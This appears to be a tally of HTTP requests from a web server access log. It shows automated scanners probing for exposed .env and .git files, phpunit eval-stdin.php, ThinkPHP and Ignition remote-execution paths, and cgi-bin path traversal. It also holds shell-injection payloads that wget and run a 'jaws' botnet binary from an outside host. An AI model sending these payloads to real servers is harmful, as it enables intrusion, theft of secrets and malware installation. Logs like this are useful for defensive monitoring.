HTTP/1.1 |
1 | GET | /.DS_Store |
HTTP/1.1 |
24 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api/search?folderIds=0 |
HTTP/1.1 |
1 | GET | /c/ |
HTTP/1.1 |
1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /idx_config/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
1 | PUT | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |